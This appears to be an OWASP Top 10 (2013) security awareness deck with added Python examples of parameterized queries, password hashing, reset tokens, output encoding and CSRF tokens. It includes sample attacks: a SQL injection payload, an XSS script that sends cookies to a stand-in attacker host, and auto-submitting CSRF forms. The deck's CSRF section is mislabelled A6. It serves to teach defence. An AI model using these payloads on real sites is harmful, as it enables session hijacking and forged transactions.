Many thanks (content & inspiration) to:
Jim Manico, Eoin Keary & Troy Hunt
WARNING
This is an awareness document.
There are more than 10 issues.
You cannot secure an application
based on a top ten list.
OWASP Top 10 - 2013
A1 Injection
$NEW_EMAIL = $_REQUEST['new_email'];   // untrusted input, used as-is
$sql = "update users set email='$NEW_EMAIL' where id=132005;";
SQL Injection
1. WHAT IF: $NEW_EMAIL = ';--
2. update users set email='$NEW_EMAIL' where id=132005;
3. update users set email='';--' where id=132005;
The quote closes the string literal and -- turns the rest of the statement, WHERE clause included, into a comment: every user's email is blanked, not just user 132005's.
SQL Injection
$dbh->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);   // real server-side prepares
$stmt = $dbh->prepare("update users set email=:new_email where id=:user_id");
$stmt->bindParam(':new_email', $email);
$stmt->bindParam(':user_id', $id, PDO::PARAM_INT);
$stmt->execute();
Query Parameterization
(PHP PDO)
using (var objConnection = new SqlConnection(_ConnectionString))
using (var objCommand = new SqlCommand(
    "SELECT * FROM User WHERE Name = @Name AND Password = @Password",
    objConnection))
{
    // values travel as typed parameters, never as part of the SQL text
    objCommand.Parameters.AddWithValue("@Name", NameTextBox.Text);
    objCommand.Parameters.AddWithValue("@Password", PassTextBox.Text);
    objConnection.Open();
    SqlDataReader objReader = objCommand.ExecuteReader();
    // (comparing a password column inside SQL implies the password is stored
    //  in the clear; see Password Storage below for what to store instead)
}
Query Parameterization
(.NET)
String newName = request.getParameter("newName");
String id = request.getParameter("id");

// SQL (JDBC)
PreparedStatement pstmt = con.prepareStatement(
    "UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?");
pstmt.setString(1, newName);
pstmt.setString(2, id);
pstmt.executeUpdate();

// HQL (Hibernate): named parameters, same idea
Query safeHQLQuery = session.createQuery("from Employees where id=:empId");
safeHQLQuery.setParameter("empId", id);
Query Parameterization
(Java)
# Create
Project.create!(:name => 'owasp')
# Read: placeholders or a conditions hash, never string interpolation
Project.all(:conditions => ["name = ?", name])
Project.all(:conditions => { :name => name })
Project.where("name = :name", :name => name)
Project.where(:id => params[:id]).all
# Update
project.update_attributes(:name => 'owasp')
# (the :conditions finder options are Rails 2/3; on Rails 4+ use the where forms)
Query Parameterization
(RoR)
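The deck shows the `';--` payload on a slide and then the parameterized forms in four languages; the following added example (not part of the slides) runs both sides against a throwaway SQLite table so the difference is visible in the data. The table, its two rows and the helper names are constructed for the demonstration; Python's stdlib `sqlite3` stands in for whichever driver you use.

```python
import sqlite3

# The deck's payload: the quote closes the string literal and "--" comments
# out everything after it, WHERE clause included.
PAYLOAD = "';--"


def fresh_db():
    """Constructed sample table (not from the slides)."""
    db = sqlite3.connect(":memory:")
    db.execute("create table users (id integer primary key, email text)")
    db.executemany("insert into users values (?, ?)",
                   [(132005, "alice@example.com"), (132006, "bob@example.com")])
    return db


def update_email_concat(db, new_email):
    """Vulnerable: the untrusted value is spliced into the SQL text."""
    sql = "update users set email='" + new_email + "' where id=132005"
    db.execute(sql)
    return sql


def update_email_param(db, new_email):
    """Safe: the value is bound as a parameter; the SQL text never changes."""
    db.execute("update users set email=? where id=132005", (new_email,))


def emails(db):
    return dict(db.execute("select id, email from users order by id"))


def demo():
    vuln, safe = fresh_db(), fresh_db()
    sql_sent = update_email_concat(vuln, PAYLOAD)
    update_email_param(safe, PAYLOAD)
    return {
        "sql_sent": sql_sent,   # update users set email='';--' where id=132005
        "concat": emails(vuln), # both rows blanked: the WHERE clause was commented out
        "param": emails(safe),  # only 132005 changed, and it holds the literal ';--
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The parameterized path stores the attacker's string as data; the concatenated path loses the WHERE clause and rewrites every row, which is the "more than one user affected" outcome the slide's walk-through implies.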
OWASP Top 10 - 2013
A2 Broken Authentication and Session Management: Password Defenses
Disable browser autocomplete on credential fields
<form autocomplete="off">
<input autocomplete="off">
(best effort only: current browsers ignore it for password fields so that password managers keep working)
Only send passwords over HTTPS POST
Do not display passwords in the browser: <input type="password">
Choose the storage scheme based on what you need to protect against
Use a per-credential salt (no two equal passwords produce the same stored value)
scrypt / PBKDF2 (slow by design: a performance hit for you, a bigger one for the attacker; easy to adopt)
HMAC (fast, but requires good key storage; tough to operate)
Password Storage
1) Do not limit the type of characters or the length (within reason) of user passwords
  – Limiting passwords to protect against injection is doomed to failure
  – Use proper encoders and the other defenses described instead
2) Use a cryptographically strong, credential-specific salt
  – protect([salt] + [password])
  – Use a 32- or 64-character salt (may depend on the protection function)
  – Do not depend on hiding, splitting or otherwise obscuring the salt
3) Impose difficult verification on the attacker ONLY
  – HMAC-SHA256([private key], [salt] + [password])
  – Protect the key as you would any private key
  – Store the key outside the credential store
  – An improvement over (solely) salted schemes; relies on proper key creation and management
4) Impose difficult verification on both attacker and defender (impacts the attacker more)
  – pbkdf2([salt] + [password], c=10,000,000)
    (the iteration count is a tuning knob: pick the largest value your login latency budget allows)
  – PBKDF2 when FIPS certification or enterprise support on many platforms is required
  – scrypt when resisting hardware-accelerated attacks matters more
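Points 2 to 4 above are easy to get subtly wrong (unsalted, non-constant-time compare, cost never revisited). The following added example, which is not from the slides, implements options 3 and 4 with Python's stdlib: a self-describing PBKDF2 record whose cost can be raised later, the keyed HMAC scheme, and an scrypt variant. The iteration count, salt length and key are assumptions for the demonstration.

```python
import hashlib
import hmac
import os

# Assumed cost parameters: tune so that one verification costs roughly 100 ms
# on the login servers. The deck's c=10,000,000 is the same knob turned up far.
PBKDF2_ITERATIONS = 200_000
SALT_BYTES = 32


def pbkdf2_hash(password, salt=None, iterations=PBKDF2_ITERATIONS):
    """Option 4: salted PBKDF2-HMAC-SHA256, slow for attacker and defender.
    The record carries its own parameters so the cost can grow over time."""
    salt = salt if salt is not None else os.urandom(SALT_BYTES)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())


def pbkdf2_verify(stored, candidate):
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", candidate.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    # constant-time compare: no timing side channel on the stored digest
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))


def hmac_hash(key, password, salt=None):
    """Option 3: HMAC-SHA256([key], [salt] + [password]). Fast, but only as
    strong as the secrecy of `key`, which must live outside the credential store."""
    salt = salt if salt is not None else os.urandom(SALT_BYTES)
    tag = hmac.new(key, salt + password.encode("utf-8"), hashlib.sha256).digest()
    return "hmac_sha256$%s$%s" % (salt.hex(), tag.hex())


def hmac_verify(key, stored, candidate):
    algo, salt_hex, tag_hex = stored.split("$")
    tag = hmac.new(key, bytes.fromhex(salt_hex) + candidate.encode("utf-8"),
                   hashlib.sha256).digest()
    return algo == "hmac_sha256" and hmac.compare_digest(tag, bytes.fromhex(tag_hex))


def scrypt_hash(password, salt=None, n=2 ** 14, r=8, p=1):
    """Option 4, memory-hard variant; requires an OpenSSL build with scrypt."""
    salt = salt if salt is not None else os.urandom(SALT_BYTES)
    dk = hashlib.scrypt(password.encode("utf-8"), salt=salt, n=n, r=r, p=p)
    return "scrypt$%d$%d$%d$%s$%s" % (n, r, p, salt.hex(), dk.hex())


def same_password_different_records(password):
    """Point 2: a per-credential salt means two users with the same password
    get different records, so one cracked hash reveals one account only."""
    return pbkdf2_hash(password) != pbkdf2_hash(password)
```

Point 1 falls out for free: PBKDF2 and HMAC accept any length and any Unicode input, so nothing in the code above needs to restrict what a user may type.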
Basic MFA Considerations
• Where do you send the token?
  – Email (worst, yet better than none!)
  – SMS (ok)
  – Mobile native app (good)
  – Dedicated token (great)
  – Printed tokens (interesting)
• How do you handle thick clients?
  – Email services, for example
  – Dedicated and strong per-app passwords
• How do you handle unavailable MFA devices?
  – Printed back-up codes
  – Fallback mechanism (like email)
  – Call-in center
• How do you handle mobile apps?
  – When is MFA not useful in mobile app scenarios?
"Forgot Password" design
1. Require identity information: last name, account number, email, DOB
   Enforce a lockout policy
2. Ask one or more good security questions
   https://www.owasp.org/index.php/Choosing_and_Using_Security_Questions_Cheat_Sheet
3. Send the user a randomly generated token out of band (email, SMS, or hardware/software token generator)
4. Verify the code in the same web session
   Enforce a lockout policy
5. Change the password
   Enforce the password policy
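Steps 3 and 4 of the flow carry the security properties that are usually missed: the code must be unguessable, expire, be single-use, be tied to the session that asked for it, and stop being accepted after a few wrong guesses. The following added example (not from the slides) models that state machine in memory; the TTL, attempt limit and result strings are assumptions, and a real application keeps this in its session store.

```python
import hmac
import secrets
import time

TOKEN_TTL_SECONDS = 15 * 60   # assumed: reset codes are short-lived
MAX_ATTEMPTS = 5              # assumed lockout threshold


class ResetFlow:
    """One outstanding code per user: random, time-boxed, single-use and
    bound to the web session that requested it."""

    def __init__(self, now=time.time):
        self.now = now
        self.pending = {}   # user -> {code, session, expires, attempts}

    def start(self, user, session_id):
        # Step 3: generate the code here; the caller delivers it out of band
        code = secrets.token_urlsafe(24)
        self.pending[user] = {"code": code, "session": session_id,
                              "expires": self.now() + TOKEN_TTL_SECONDS,
                              "attempts": 0}
        return code

    def verify(self, user, session_id, code):
        # Step 4: same session, not expired, lockout before the compare
        entry = self.pending.get(user)
        if entry is None:
            return "no-request"
        if entry["session"] != session_id:
            return "wrong-session"
        if self.now() > entry["expires"]:
            del self.pending[user]
            return "expired"
        entry["attempts"] += 1
        if entry["attempts"] > MAX_ATTEMPTS:
            del self.pending[user]
            return "locked-out"
        if not hmac.compare_digest(entry["code"].encode(), code.encode()):
            return "bad-code"
        del self.pending[user]   # single use: a replayed code fails
        return "ok"
```

The lockout check deliberately runs before the comparison, so the correct code submitted on the sixth try is still refused and the user has to start over.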
OWASP Top 10 - 2013
A3 Cross Site Scripting (XSS)
<script>
var badURL = 'https://evileviljim.com/somesite/data=' + document.cookie;
var img = new Image();
img.src = badURL;   // the cookie leaves the browser as a GET to the attacker (an HttpOnly cookie would not be readable here)
</script>
<script>document.body.innerHTML='<blink>CYBER IS COOL</blink>';</script>
Anatomy of an XSS Attack
Impact of XSS
– Session Hijacking
– Site Defacement
– Network Scanning
– Undermining CSRF Defenses
– Site Redirection/Phishing
– Load of Remotely Hosted Scripts
– Data Theft
– Keystroke Logging
– Attackers using XSS more frequently
XSS Prevention (.NET)
• WebForms / WebForms view engine: <%= Server.HtmlEncode(data) %>
• WebForms v4.0+: <%: data %> (the colon syntax HTML-encodes)
• MVC3+ Razor view engine: @data (encoded by default)
• Data binding in WebForms v4 and below: <%# Server.HtmlEncode(Eval("property")) %>
• Data binding in v4.5: <%#: Item.Property %>
• Better: ASP.NET 3.5 and below, use the AntiXss library directly
  Microsoft.Security.Application.Encoder.HtmlEncode(message)
XSS Prevention (.NET)
• ASP.NET 4 (WebForms and MVC):
  <httpRuntime encoderType="Microsoft.Security.Application.AntiXssEncoder, AntiXssLibrary"/>
• ASP.NET 4.5 (AntiXss is included in this version!):
  <httpRuntime encoderType="System.Web.Security.AntiXss.AntiXssEncoder, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"/>
• JSON (MVC): Json.Encode(Model)
• JavaScript encoding using AntiXss: Encoder.JavaScriptEncode(Model.FirstName)
OWASP Java Encoder Project
• Context-specific output encoding: < becomes &lt;
• No third-party libraries or configuration necessary
• Designed for high-availability / high-performance encoding
• Simple drop-in encoding functionality
• Performance, ESAPI integration
• More complete API (URI and URI component encoding, etc.) in some regards
• Java 1.5+
• Last updated January 30, 2014 (version 1.1.1)
https://www.owasp.org/index.php/OWASP_Java_Encoder_Project
OWASP Java Encoder Project
Problem: Web page built in Java JSP is vulnerable to XSS
Solution: encode for the exact context the data lands in
1) <input type="text" name="data" value="<%= Encode.forHtmlAttribute(dataValue) %>" />
2) <textarea name="text"><%= Encode.forHtmlContent(textValue) %></textarea>
3) <button onclick="alert('<%= Encode.forJavaScriptAttribute(alertMsg) %>');">click me</button>
4) <script type="text/javascript">
   var msg = "<%= Encode.forJavaScriptBlock(message) %>";
   alert(msg);
   </script>
HTML Contexts
Encode#forHtmlContent(String)
Encode#forHtmlAttribute(String)
Encode#forHtmlUnquotedAttribute(String)
XML Contexts
Encode#forXml(String)
Encode#forXmlContent(String)
Encode#forXmlAttribute(String)
Encode#forXmlComment(String)
Encode#forCDATA(String)
CSS Contexts
Encode#forCssString(String)
Encode#forCssUrl(String)
JavaScript Contexts
Encode#forJavaScript(String)
Encode#forJavaScriptAttribute(String)
Encode#forJavaScriptBlock(String)
Encode#forJavaScriptSource(String)
URI/URL contexts
Encode#forUri(String)
Encode#forUriComponent(String)
OWASP Java Encoder Project
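Why the encoder has one method per context, and why case 3 above is `forJavaScriptAttribute` rather than plain HTML encoding: a browser HTML-decodes an `onclick` attribute first and only then parses the result as JavaScript, so HTML encoding alone is undone before the JavaScript parser sees the data. The following added example (not from the slides or the Java Encoder project) reimplements the relevant contexts in Python, models that two-step decode, and checks whether a constructed payload escapes the string literal. Function names and the payload are assumptions.

```python
import html


def for_html_content(s):
    """Text between tags: & < > " ' are encoded."""
    return html.escape(s, quote=True)


def for_html_attribute(s):
    """Quoted attribute value: the same character set suffices."""
    return html.escape(s, quote=True)


def for_javascript(s):
    """Inside a JS string literal: backslash-escape quotes and backslashes,
    hex-escape control and HTML-significant characters, and escape '/' so
    the literal can never contain '</script>' (the forJavaScriptBlock case)."""
    out = []
    for ch in s:
        if ch in "\\'\"":
            out.append("\\" + ch)
        elif ch == "/":
            out.append("\\/")
        elif ch == "\n":
            out.append("\\n")
        elif ch == "\r":
            out.append("\\r")
        elif ord(ch) < 0x20 or ch in "<>&=":
            out.append("\\x%02X" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)


def for_javascript_attribute(s):
    """Event-handler attribute: the browser HTML-decodes, then parses JS,
    so encode in the reverse order: JS first, then HTML attribute."""
    return for_html_attribute(for_javascript(s))


def browser_attribute_decode(attr_value):
    """Model of the browser's first step on onclick="...": HTML decoding."""
    return html.unescape(attr_value)


def js_string_literal_intact(js, quote="'"):
    """True if `js`, placed inside an open JS string literal delimited by
    `quote`, never terminates that literal (honours backslash escapes)."""
    i = 0
    while i < len(js):
        if js[i] == "\\":
            i += 2
            continue
        if js[i] == quote:
            return False
        i += 1
    return True


PAYLOAD = "'); alert(document.cookie); ('"   # constructed attacker input


def html_only_in_onclick():
    """Wrong context: after the attribute decode the quotes are back."""
    return js_string_literal_intact(browser_attribute_decode(for_html_attribute(PAYLOAD)))


def js_then_html_in_onclick():
    """Right context: what survives the attribute decode is JS-escaped."""
    return js_string_literal_intact(browser_attribute_decode(for_javascript_attribute(PAYLOAD)))
```

The same reasoning drives `forJavaScriptSource` on the next slide: a script served as its own resource is never HTML-decoded, so JS escaping alone is correct there and HTML encoding would corrupt the output.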
<script src="/my-server-side-generated-script"></script>

class MyServerSideGeneratedScript extends HttpServlet {
    protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws IOException {
        response.setContentType("text/javascript; charset=UTF-8");
        PrintWriter w = response.getWriter();
        // named function: a bare anonymous function is not a valid statement
        w.println("function showMessage() {");
        w.println("  alert('" + Encode.forJavaScriptSource(theTextToAlert) + "');");
        w.println("}");
    }
}
OWASP Java Encoder Project
Other Encoding Libraries
• Ruby on Rails
  – http://api.rubyonrails.org/classes/ERB/Util.html
• Reform Project
  – Java, .NET v1/v2, PHP, Python, Perl, JavaScript, Classic ASP
  – https://www.owasp.org/index.php/Category:OWASP_Encoding_Project
• ESAPI
  – PHP, .NET, Python, Classic ASP, ColdFusion
  – https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API
• .NET AntiXSS Library
  – http://wpl.codeplex.com/releases/view/80289
OWASP HTML Sanitizer Project
• Written in Java; lets you include HTML authored by third parties in your web application while protecting against XSS
• Has an extensive test suite and has undergone adversarial security review
  https://code.google.com/p/owasp-java-html-sanitizer/wiki/AttackReviewGroundRules
• Very easy to use
• Allows simple programmatic POSITIVE (allow-list) policy configuration; no XML config
• Derived from Google's Caja project
• High performance and low memory utilization
https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project
Solving real world problems (using OWASP HTML Sanitizer)
Problem: Web page is vulnerable to XSS because of untrusted HTML
Solution: an allow-list policy; everything not listed is dropped
PolicyFactory policy = new HtmlPolicyBuilder()
    .allowElements("a")
    .allowUrlProtocols("https")
    .allowAttributes("href").onElements("a")
    .requireRelNofollowOnLinks()
    .build();
String safeHTML = policy.sanitize(untrustedHTML);
Other HTML Sanitizers
• Pure JavaScript
  – http://code.google.com/p/google-caja/wiki/JsHtmlSanitizer
• Python
  – https://pypi.python.org/pypi/bleach
• PHP
  – http://htmlpurifier.org/
  – http://www.bioinformatics.org/phplabware/internal_utilities/htmLawed/
• .NET
  – AntiXSS.GetSafeHtml / GetSafeHtmlFragment
  – http://htmlagilitypack.codeplex.com/
• Ruby on Rails
  – http://api.rubyonrails.org/classes/HTML.html
DOM-based XSS Defense
• JavaScript-encode and delimit untrusted data as quoted strings
• Avoid HTML rendering methods like innerHTML
  – If you must, sanitize the untrusted HTML first
• Avoid code execution contexts: eval(), setTimeout() with a string argument, event handlers
• When possible, treat untrusted data as display text only
• To build dynamic interfaces, use document.createElement("…"), element.setAttribute("…", "value"), element.appendChild(…)
  (setAttribute is not safe for href/src with untrusted URLs, where a javascript: scheme still executes, nor for on* handler attributes)
• Parse JSON with JSON.parse in the browser, never with eval()
SAFE use of jQuery
$('#element').text(UNTRUSTED_DATA);
UNSAFE use of jQuery
$('#element').html(UNTRUSTED_DATA);
OWASP Top 10 - 2013
A4 Insecure Direct Object Reference
Using Fiddler (or any intercepting proxy) an attacker can change the id in the request and access other users' information.
Insecure Direct Object Reference
We need to change the method signature (the ID is now a GUID), then translate it back to the original, direct reference before going any further:
public Customer GetCustomer(Guid indirectId)
{
    var customerId = IndirectReferenceMap.GetDirectReference(indirectId);
    // ... load and return the customer ...
}
Indirection hides the real key but is not an authorization check: the resolved customerId must still be checked against the caller's entitlement (see Access Control).
Insecure Direct Object Reference
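The slide's `IndirectReferenceMap` is a sketch rather than a library; the following added example (not from the slides) shows what such a map has to do and why it is only half the fix. The handles are random and issued per session, so a guessed or borrowed handle resolves to nothing, and the resolved record is still checked for ownership, because a handle can leak legitimately (a listing page, a log line). The customer store, session shape and helper names are constructed.

```python
import secrets


class IndirectReferenceMap:
    """Per-session map between opaque handles and real ids (a constructed
    analogue of the slide's IndirectReferenceMap, not a real library)."""

    def __init__(self):
        self._to_direct = {}
        self._to_indirect = {}

    def indirect(self, direct_id):
        """Hand out (or reuse) an unguessable handle for a real id."""
        if direct_id not in self._to_indirect:
            handle = secrets.token_urlsafe(16)
            self._to_indirect[direct_id] = handle
            self._to_direct[handle] = direct_id
        return self._to_indirect[direct_id]

    def direct(self, handle):
        """Resolve a handle; unknown handles (including another session's) fail."""
        return self._to_direct.get(handle)


# Constructed data store: customer id -> (owner, record)
CUSTOMERS = {1: ("alice", {"name": "Alice"}), 2: ("bob", {"name": "Bob"})}


def get_customer_vulnerable(customer_id):
    """The pattern Fiddler defeats: whatever id the client sends is served."""
    return CUSTOMERS[customer_id][1]


def get_customer(session, handle):
    """Two layers: the handle must have been issued to this session, and the
    resolved record must belong to the session's user."""
    customer_id = session["refs"].direct(handle)
    if customer_id is None:
        raise PermissionError("unknown reference")
    owner, record = CUSTOMERS[customer_id]
    if owner != session["user"]:
        raise PermissionError("not your record")
    return record


def new_session(user):
    return {"user": user, "refs": IndirectReferenceMap()}


def probe(session, handle):
    """Helper for tests and logs: the record, or the denial reason."""
    try:
        return get_customer(session, handle)
    except PermissionError as e:
        return "denied: " + str(e)
```

If the ownership check is in place, the indirect map buys you enumeration resistance and nothing more; if it is missing, the map only slows the attacker down until a handle leaks.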
OWASP Top 10 - 2013
A5 Security Misconfiguration
Is it really the developers' work? Or the sysadmins?
If the developers don't know, how will the application
security design be complete?
What about configuring in Dev & Testing environments?
Hardening the servers (general)
• Harden the operating system
  – BIOS and GRUB passwords; secure physical access
  – Use multiple partitions (not the default install); mount with options like ro, nosuid, noexec, nodev, --make-runbindable ...
  – Remove all unnecessary packages and drivers (do you really need Xorg? All those fonts?)
  – Lock down the rest (cron, USB detection, IPv6, ctrl-alt-del, ...)
  – SSH key-based login only (ssh-keygen); disable password login
  – Enable ufw / iptables / ... and a HIDS; turn on remote logging
  – Oh yeah, regular patches and updates (don't wait!)
  – Regular backups!
Secure Config Tips (Tomcat)
• Run Tomcat under a Security Manager
  – http://tomcat.apache.org/tomcat-6.0-doc/security-manager-howto.html
  – Modify $CATALINA_BASE/conf/catalina.policy
    PropertyPermission, RuntimePermission, FilePermission, SocketPermission, NetPermission, ReflectPermission, ...
  – Configure package access (careful! test and debug!)
    $CATALINA_BASE/conf/catalina.properties
  – Restart Tomcat with the manager enabled
    $CATALINA_HOME/bin/catalina.sh start -security   (Unix)
    %CATALINA_HOME%\bin\catalina start -security     (Windows)
• More tips
  – http://www.tomcatexpert.com/blog/2011/11/02/best-practices-securing-apache-tomcat-7
  – Use the Security Lifecycle Listener (org.apache.catalina.security.SecurityListener: refuses to start as root and enforces a minimum umask)
  – Lock down connector interfaces (bind only the addresses you need)
  – Disable the shutdown port (port="-1" in server.xml) or at least change the default shutdown string
  – Secure the Manager web application (strong credentials, restrict by source address)
  – Configure AccessLogValve and RemoteAddrValve
Secure Config Tips (JBoss)
• Similar principles as Tomcat
  – Use the Java Security Manager
  – Configure policies and access permissions
  – Use security realms
  – Disable remote access to JMX
  – Configure TLS carefully: remove old protocols, weak ciphers, insecure renegotiation, legacy support, etc.
  – Secure the management interfaces (disable HTTP management if unused)
  – ...
Securing web.config
5 things to remember here:
• Error handling (enable custom errors)
• Disable TRACE
• Disable debugging
• HttpOnly cookies
• Session state: cookieless="UseCookies"
Encrypting web.config
• Steps:
  – Go to C:\Windows\Microsoft.NET\Framework\v4.0.30319 in a command prompt
    aspnet_regiis.exe -pef "connectionStrings" "<directory containing Web.config>"
• Decrypting web.config
  – Same path
    aspnet_regiis.exe -pdf "connectionStrings" "<directory containing Web.config>"
• The section is decrypted transparently at runtime under the application pool identity, so that account needs access to the provider's key container and nothing else should have it
(screenshots: web.config before and after encrypting)
References
http://www.owasp.org
http://www.codeproject.com/Tips/795135/Encrypt-ConnectionString-in-Web-Config
OWASP Top 10 - 2013
A6 Sensitive Data Exposure
<img src="https://google.com/logo.png">                    <!-- harmless: a cross-site GET for an image -->
<img src="https://google.com/deleteMail/7/confirm=true">   <!-- the same GET, but it performs an action with the victim's cookies -->
<form method="POST" action="https://mybank.com/transfer">
  <input type="hidden" name="account" value="23532632"/>
  <input type="hidden" name="amount" value="1000"/>
</form>
<script>document.forms[0].submit()</script>                <!-- POST is no defence by itself -->
A8 Cross Site Request Forgery
How many tabs on your browser?
How many are already "logged in"?
Waiting to update your status, accept your credit card or email your friends
What if another tab manages to send a request?
What about others with the "remember me" checkbox?
No need for the tab to be open... just send a request and they'll happily accept!
(demo: using Fiddler we capture the JSON request)
Anti-Forgery Tokens (ASP.NET MVC / Web API)
To add the anti-forgery tokens to a Razor page, use the HtmlHelper.AntiForgeryToken helper method:
@using (Html.BeginForm("Manage", "Account"))
{
    @Html.AntiForgeryToken()
}
This method adds the hidden form field and also sets the cookie token.
For AJAX calls, send both tokens in a request header:
<script>
@functions {
    public string TokenHeaderValue()
    {
        string cookieToken, formToken;
        AntiForgery.GetTokens(null, out cookieToken, out formToken);
        return cookieToken + ":" + formToken;
    }
}
$.ajax("api/values", {
    type: "post",
    contentType: "application/json",
    data: { },   // JSON data goes here
    dataType: "json",
    headers: { 'RequestVerificationToken': '@TokenHeaderValue()' }
});
</script>
void ValidateRequestHeader(HttpRequestMessage request)
{
    string cookieToken = "";
    string formToken = "";
    IEnumerable<string> tokenHeaders;
    if (request.Headers.TryGetValues("RequestVerificationToken", out tokenHeaders))
    {
        string[] tokens = tokenHeaders.First().Split(':');
        if (tokens.Length == 2)
        {
            cookieToken = tokens[0].Trim();
            formToken = tokens[1].Trim();
        }
    }
    AntiForgery.Validate(cookieToken, formToken);   // throws on mismatch or missing tokens
}
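What `AntiForgery.Validate` checks behind that header is the property that makes the scheme work: the form token is cryptographically tied to the cookie token and to the user's session, so a cross-site page can neither read the victim's tokens nor substitute a pair obtained from the attacker's own session. The following added example (not from the slides or ASP.NET) implements that check with an HMAC and parses the same `cookie:form` header layout. The server key, session ids and header handling are assumptions.

```python
import hashlib
import hmac
import secrets

# Assumed: in a real deployment this is loaded from configuration, never hard-coded.
SERVER_KEY = b"constructed-server-side-key-32-bytes!!"


def issue_tokens(session_id):
    """Returns (cookie_token, form_token). The form token is an HMAC over the
    session id and the cookie token, so a pair lifted from the attacker's own
    session does not validate against the victim's session."""
    cookie_token = secrets.token_urlsafe(24)
    form_token = hmac.new(SERVER_KEY, (session_id + ":" + cookie_token).encode(),
                          hashlib.sha256).hexdigest()
    return cookie_token, form_token


def validate(session_id, cookie_token, form_token):
    if not cookie_token or not form_token:
        return False
    expected = hmac.new(SERVER_KEY, (session_id + ":" + cookie_token).encode(),
                        hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, form_token)


def validate_request_header(session_id, headers):
    """Mirror of the slide's ValidateRequestHeader: the AJAX caller sends
    'RequestVerificationToken: <cookie>:<form>'. Header names are matched
    case-insensitively, as HTTP requires."""
    value = next((v for k, v in headers.items()
                  if k.lower() == "requestverificationtoken"), None)
    if value is None:
        return False
    parts = value.split(":")
    if len(parts) != 2:
        return False
    return validate(session_id, parts[0].strip(), parts[1].strip())
```

A forged request from another origin fails twice over: the browser will not attach a custom header to a cross-site form post at all, and even a script that could would not hold tokens bound to the victim's session.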
OWASP Top 10 - 2013
A7 Missing Function Level Access Control
if ((user.isManager() ||
     user.isAdministrator() ||
     user.isEditor()) &&
    (user.id() != 1132)) {
    //execute action
}
How do you change the policy of this code?
Access Control
What is Access Control
• Authorization: the process where a system determines whether a specific user has access to a resource
• Permission: represents app behaviour only
• Entitlement: what a user is actually allowed to do
• Principal/User: who or what you are entitling
• Implicit role: named permission, user associated
  – if (user.isRole("Manager")) { ... }
• Explicit role: named permission, resource associated
  – if (user.isAuthorized("report:view:3324")) { ... }
• Hard-coded role checks in application code
• Lack of centralized access control logic
• Untrusted data driving access control decisions
• Access control that is “open by default”
• Lack of addressing horizontal access control in a
standardized way (if at all)
• Access control logic that needs to be manually added to
every endpoint in code
• Access Control that is “sticky” per session
• Access Control that requires per-user policy
Access Control DON'Ts
• Vertical Access Control Attacks
– A standard user accessing administration
functionality
• Horizontal Access Control Attacks
– Same role, but accessing another user's private
data
• Business Logic Access Control Attacks
– Abuse of one or more linked activities that
collectively realize a business objective
Attacks on Access Control
• Loss of accountability
– Attackers maliciously execute actions as other
users
– Attackers maliciously execute higher level
actions
• Disclosure of confidential data
– Compromising admin-level accounts often
results in access to user’s confidential data
• Data tampering
– Privilege levels do not distinguish users who can
only view data and users permitted to modify
data
Impact of poor Access Control
• Apache Shiro is a powerful and easy to use Java security
framework
• Offers developers an intuitive yet comprehensive
solution to authentication, authorization, cryptography,
and session management
• Built on sound interface-driven design and OO principles
• Enables custom behavior
• Sensible and secure defaults for everything
Apache Shiro
http://shiro.apache.org/
Solving real world Access Control problems
Problem: Web application needs a secure access control mechanism
Solution:
if ( currentUser.isPermitted( "lightsaber:wield" ) ) {
    log.info("You may use a lightsaber ring. Use it wisely.");
} else {
    log.info("Sorry, lightsaber rings are for schwartz masters only.");
}
Solving real world Access Control problems
Problem: Web application needs secure access to a specific object
Solution:
int winnebagoId = request.getInt("winnebago_id");
if ( currentUser.isPermitted( "winnebago:drive:" + winnebagoId ) ) {
    log.info("You are permitted to 'drive' the 'winnebago'. Here are the keys.");
} else {
    log.info("Sorry, you aren't allowed to drive this winnebago!");
}
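The two Shiro snippets rely on the semantics of its colon-separated permission strings: a grant with fewer parts implies everything beneath it, `*` matches any value, and commas list alternatives. That is what makes `"winnebago:drive:" + winnebagoId` an explicit, resource-associated check rather than a role check. The following added example (not from the slides or Shiro itself) reimplements those matching rules in Python so the behaviour can be exercised; the user table and permission strings are constructed.

```python
WILDCARD = "*"


def parse(permission):
    """'winnebago:drive:eagle5' -> [{'winnebago'}, {'drive'}, {'eagle5'}].
    Commas inside a part are alternatives: 'printer:print,query'."""
    parts = []
    for raw in permission.strip().split(":"):
        subparts = {p.strip().lower() for p in raw.split(",") if p.strip()}
        if not subparts:
            raise ValueError("permission has an empty part: %r" % permission)
        parts.append(subparts)
    return parts


def implies(granted, requested):
    """Shiro WildcardPermission semantics, reimplemented for illustration:
    a granted permission with fewer parts implies everything below it
    ('winnebago:drive' implies 'winnebago:drive:eagle5'); any extra trailing
    parts on the granted side must all be wildcards."""
    g, r = parse(granted), parse(requested)
    i = 0
    for r_part in r:
        if i >= len(g):
            return True
        g_part = g[i]
        if WILDCARD not in g_part and not r_part <= g_part:
            return False
        i += 1
    return all(WILDCARD in g_part for g_part in g[i:])


def is_permitted(granted_permissions, requested):
    return any(implies(p, requested) for p in granted_permissions)


# Constructed users; in Shiro these grants come from a Realm, not from code.
USERS = {
    "lonestar": ["lightsaber:wield", "winnebago:drive:eagle5"],
    "helmet":   ["winnebago:*"],
    "barf":     ["winnebago:ride,wash:eagle5"],
}


def may_drive(user, winnebago_id):
    """The slide's check, with the object id taken from the request."""
    return is_permitted(USERS[user], "winnebago:drive:" + str(winnebago_id))
```

Because the policy lives in the permission strings, changing who may drive which winnebago is a data change in the realm, not an edit to the `if` on the earlier "How do you change the policy of this code?" slide.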
HTTP: POST vs GET
"GET" exposes sensitive authentication information in the URL:
  – in web server and proxy server logs
  – in the HTTP Referer header
  – in bookmarks/favourites, which are often emailed to others
